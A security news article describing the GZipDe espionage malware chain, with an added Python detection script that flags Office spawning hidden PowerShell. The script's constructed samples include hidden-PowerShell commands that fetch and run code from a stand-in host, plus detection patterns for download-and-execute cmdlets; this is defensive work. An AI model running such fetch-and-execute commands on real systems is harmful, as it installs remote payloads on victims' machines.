New GZipDe malware spotted serving up Metasploit backdoor

Security researchers have discovered a new malware strain dubbed GZipDe that appears to be part of a targeted cyberespionage campaign and drops a Metasploit backdoor. According to AlienVault researchers, the malware was detected after a user from Afghanistan uploaded a weaponized Microsoft Word document to VirusTotal.

"Although the final goal seems to be the installation of a Metasploit backdoor, we found an interesting .NET downloader which uses a custom encryption method to obfuscate process memory and evade antivirus detection," AlienVault researcher Jose Manuel Martin wrote in a blog post.

The decoy document carries a malicious macro and contains text lifted from an article published in May about the upcoming Shanghai Cooperation Organization summit. If the document is opened and the macro runs, it executes a Visual Basic script that is stored as a hexadecimal stream; that script launches a new task in a hidden PowerShell console, which downloads a PE32 executable that in turn drops the GZipDe malware.
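Two points in the chain above are visible to a defender: the macro body, where the script is hidden as a hex stream, and the process tree, where Word spawns a hidden PowerShell that fetches a second stage. The following added example, written for this article and not taken from AlienVault's post or the GZipDe sample, decodes a hex-stored script and flags its keywords, then scores Sysmon-style process-creation events for the Office-to-hidden-PowerShell-to-download pattern. The event records, the hex blob, the file names and the host example.invalid are constructed for illustration.

```python
"""Detection heuristics for a macro -> hidden PowerShell -> download chain.

Added example for this article; not AlienVault's or Cyware's code, and it
makes no claim about GZipDe's real command lines. Event records, the hex
blob, file names and the host example.invalid are constructed.
"""
from __future__ import annotations
import re

# Office applications that should essentially never spawn a script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe"}

# PowerShell switches that hide the console or disable the usual guard rails.
HIDDEN_OR_BYPASS = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?\b|noni(?:nteractive)?\b"
    r"|e(?:xecutionpolicy|p)\s+bypass|enc(?:odedcommand)?\s+\S{20,})",
    re.I,
)
# Cmdlets and .NET calls commonly used to fetch and run a second stage.
DOWNLOAD_OR_RUN = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient"
    r"|start-bitstransfer|invoke-expression|\biex\b|start-process",
    re.I,
)
# Keywords worth flagging once a hex-stored macro script has been decoded.
MACRO_MARKERS = re.compile(
    r"wscript\.shell|shell\.application|powershell|createobject"
    r"|-w(?:indowstyle)?\s+hidden", re.I,
)


def decode_hex_stream(stream: str) -> str:
    """Turn a script stored as a run of hex bytes back into text.

    Tolerates "0x"/"&H" prefixes, commas and whitespace, so a blob pasted
    straight out of a macro dump decodes as-is.
    """
    digits = re.sub(r"0x|&h", "", stream, flags=re.I)
    digits = re.sub(r"[^0-9a-f]", "", digits, flags=re.I)
    if len(digits) % 2:
        raise ValueError("odd number of hex digits")
    return bytes.fromhex(digits).decode("latin-1")


def analyse_hex_stream(stream: str) -> list[str]:
    """Decode a hex-stored script and return the suspicious keywords in it."""
    text = decode_hex_stream(stream)
    return sorted({m.lower() for m in MACRO_MARKERS.findall(text)})


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyse_event(ev: dict) -> list[str]:
    """Return the suspicious traits of one Sysmon-style process-creation event."""
    parent, image = _basename(ev.get("ParentImage", "")), _basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    traits = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        traits.append(f"office-spawns-script-host:{parent}->{image}")
    if image in {"powershell.exe", "pwsh.exe"} and HIDDEN_OR_BYPASS.search(cmd):
        traits.append("hidden-or-bypass-switch")
    if DOWNLOAD_OR_RUN.search(cmd):
        traits.append("download-or-execute")
    return traits


def triage(events: list[dict], min_traits: int = 2) -> list[tuple[int, list[str]]]:
    """Keep events that stack at least `min_traits` traits; one alone is noise."""
    hits = []
    for ev in events:
        traits = analyse_event(ev)
        if len(traits) >= min_traits:
            hits.append((ev["ProcessId"], traits))
    return hits


# Constructed samples (not artifacts from the campaign).
SAMPLE_MACRO_STREAM = (
    'CreateObject("WScript.Shell").Run "powershell -w hidden -nop -c '
    'iex (iwr http://example.invalid/p)", 0'
).encode().hex(" ")

SAMPLE_EVENTS = [
    {"ProcessId": 4180,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\invitation.doc"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessId": 4312,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -w hidden -nop -ep bypass -c "
                    r"(New-Object Net.WebClient).DownloadFile('http://example.invalid/x.exe',"
                    r"'C:\Users\alice\AppData\Local\Temp\x.exe')",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"ProcessId": 5002,  # benign admin script: one trait only, must not fire
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
]

if __name__ == "__main__":
    print("macro keywords:", analyse_hex_stream(SAMPLE_MACRO_STREAM))
    for pid, traits in triage(SAMPLE_EVENTS):
        print(f"pid {pid}: {', '.join(traits)}")
```

Requiring two stacked traits keeps an administrator's `powershell.exe -NoProfile -File inventory.ps1` out of the hit list while still catching the Word to hidden PowerShell to WebClient chain; the regexes and the threshold are starting points to tune against local telemetry, and the hex decoder is the reason to scan decoded macro content rather than the raw VBA text, since a hex stream hides every keyword from a naive string match.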

The payload contains shellcode that contacts a remote server, which is currently offline. Researchers said Shodan happened to index that server and recorded it serving a Metasploit payload.

"It contains shellcode to bypass system detection and a Meterpreter payload - a capable backdoor," researchers noted. "For example, it can gather information from the system and contact the command and control server to receive further commands."

The shellcode also loads the entire DLL into memory, allowing it to operate without writing anything to disk, a technique known as reflective DLL injection. From that point the attacker can deliver any further payload to gain elevated privileges and move laterally within the local network.

Attackers increasingly opt for ready-made, publicly available tools such as Metasploit or Cobalt Strike over custom malware, even in targeted attacks. It is still unclear who is behind GZipDe or what their end goal is.

"We’ve only seen one sample of the malware," AlienVault security researcher Chris Doman told Bleeping Computer. "It seems very targeted. Given the decoy document is in English and uploaded from Afghanistan, it may have been targeting someone in an embassy or similar there."
